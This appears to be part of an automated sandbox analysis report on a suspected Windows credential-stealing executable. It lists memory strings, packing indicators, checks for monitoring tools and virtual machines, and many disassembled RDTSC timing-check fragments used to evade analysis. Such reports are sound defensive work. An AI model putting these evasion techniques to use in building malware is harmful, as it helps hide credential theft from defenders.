                Source: fnCae9FQhg.exe, 00000001.00000003.2283599646.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2259052080.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2259612391.00000000057DC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: fnCae9FQhg.exe ReversingLabs: Detection: 47%
                Source: fnCae9FQhg.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: fnCae9FQhg.exe String found in binary or memory: qRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeVPR
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File read: C:\Users\user\Desktop\fnCae9FQhg.exe
                Source: unknown Process created: C:\Users\user\Desktop\fnCae9FQhg.exe "C:\Users\user\Desktop\fnCae9FQhg.exe"
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: webio.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Section loaded: version.dll
                Source: fnCae9FQhg.exe Static file information: File size 2960384 > 1048576
                Source: fnCae9FQhg.exe Static PE information: Raw size of audsrymt is bigger than: 0x100000 < 0x2a9000

                Data Obfuscation

                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Unpacked PE file: 1.2.fnCae9FQhg.exe.9c0000.0.unpack :EW;.rsrc :W;.idata :W;audsrymt:EW;ilsizkav:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;audsrymt:EW;ilsizkav:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: fnCae9FQhg.exe Static PE information: real checksum: 0x2e1076 should be: 0x2d8bc4
                Source: fnCae9FQhg.exe Static PE information: section name:
                Source: fnCae9FQhg.exe Static PE information: section name: .rsrc
                Source: fnCae9FQhg.exe Static PE information: section name: .idata
                Source: fnCae9FQhg.exe Static PE information: section name: audsrymt
                Source: fnCae9FQhg.exe Static PE information: section name: ilsizkav
                Source: fnCae9FQhg.exe Static PE information: section name: .taggant
                Source: fnCae9FQhg.exe Static PE information: section name: entropy: 7.982075034799655

                Boot Survival

                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\fnCae9FQhg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BB1407 second address: BB1416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BB1416 second address: BB141C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF97B second address: BBF9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F539h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F1BB4E5F526h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF9A3 second address: BBF9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF9A7 second address: BBF9B1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF9B1 second address: BBF9E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F1BB4D69EAEh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BB4D69EB8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBD90C second address: BBD912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBD912 second address: BBD916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBD916 second address: BBD91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBD91A second address: BBD920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBD920 second address: BBD939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F1BB4E5F526h 0x0000000a jmp 00007F1BB4E5F52Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBDBFF second address: BBDC09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBDC09 second address: BBDC2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F1BB4E5F52Ah 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F1BB4E5F52Ch 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBDC2D second address: BBDC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE072 second address: BBE08C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4E5F534h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE08C second address: BBE090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE090 second address: BBE094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE1EC second address: BBE1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE8C6 second address: BBE8CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE8CC second address: BBE8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE8D2 second address: BBE8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BB5F48 second address: BB5F54 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1BB4D69EA6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B918C9 second address: B918DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F1BB4E5F526h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B918DA second address: B918F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1BB4D69EA6h 0x00000008 jmp 00007F1BB4D69EAAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF0C1 second address: BBF0C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF0C5 second address: BBF0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4D69EB3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BB4D69EB2h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF0F3 second address: BBF10F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F537h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF10F second address: BBF115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF3E6 second address: BBF3EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF3EC second address: BBF3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF3F2 second address: BBF3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF3F6 second address: BBF404 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F1BB4D69EA6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF404 second address: BBF408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF408 second address: BBF40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF7FC second address: BBF802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BC2114 second address: BC2119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BC2119 second address: BC211F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BC5169 second address: BC516D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BC516D second address: BC5188 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1BB4E5F526h 0x00000008 jns 00007F1BB4E5F526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F1BB4E5F528h 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BC5188 second address: BC518E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B8AC91 second address: B8AC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1BB4E5F526h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B8AC9B second address: B8ACCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB6h 0x00000007 js 00007F1BB4D69EA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1BB4D69EAFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB927 second address: BCB92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB92D second address: BCB938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB938 second address: BCB93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB93C second address: BCB940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB940 second address: BCB992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F531h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F1BB4E5F535h 0x0000001c jmp 00007F1BB4E5F539h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCAF90 second address: BCAF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB4F3 second address: BCB4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB4F7 second address: BCB511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB65D second address: BCB68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F52Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pushad 0x0000000e jng 00007F1BB4E5F538h 0x00000014 jmp 00007F1BB4E5F532h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB68F second address: BCB693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB693 second address: BCB697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCE94B second address: BCE94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCE94F second address: BCE959 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCE959 second address: BCE95E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF116 second address: BCF12A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F1BB4E5F530h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF21E second address: BCF224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF224 second address: BCF228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF3B5 second address: BCF3C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1BB4D69EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF3C3 second address: BCF3D5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF3D5 second address: BCF3DB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF4C8 second address: BCF4D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1F7D second address: BD1F87 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1BB4D69EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1F87 second address: BD1F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1F8D second address: BD1F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1F91 second address: BD1FB2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F1BB4E5F539h 0x00000013 pushad 0x00000014 jmp 00007F1BB4E5F52Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1FB2 second address: BD2002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F1BB4D69EA8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 pushad 0x00000021 mov dword ptr [ebp+122D1FA4h], ecx 0x00000027 mov cx, bx 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+122D2B71h] 0x00000031 push 00000000h 0x00000033 mov esi, dword ptr [ebp+122D1CDDh] 0x00000039 push 00000000h 0x0000003b cld 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push esi 0x00000040 jmp 00007F1BB4D69EABh 0x00000045 pop esi 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD2002 second address: BD2007 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD2AB5 second address: BD2ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD2ABB second address: BD2AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD2AC0 second address: BD2AD6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1BB4D69EA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F1BB4D69EA6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD3617 second address: BD361C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD7255 second address: BD726D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EB4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD7864 second address: BD787E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F535h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD787E second address: BD7890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EAEh 0x00000009 rdtsc
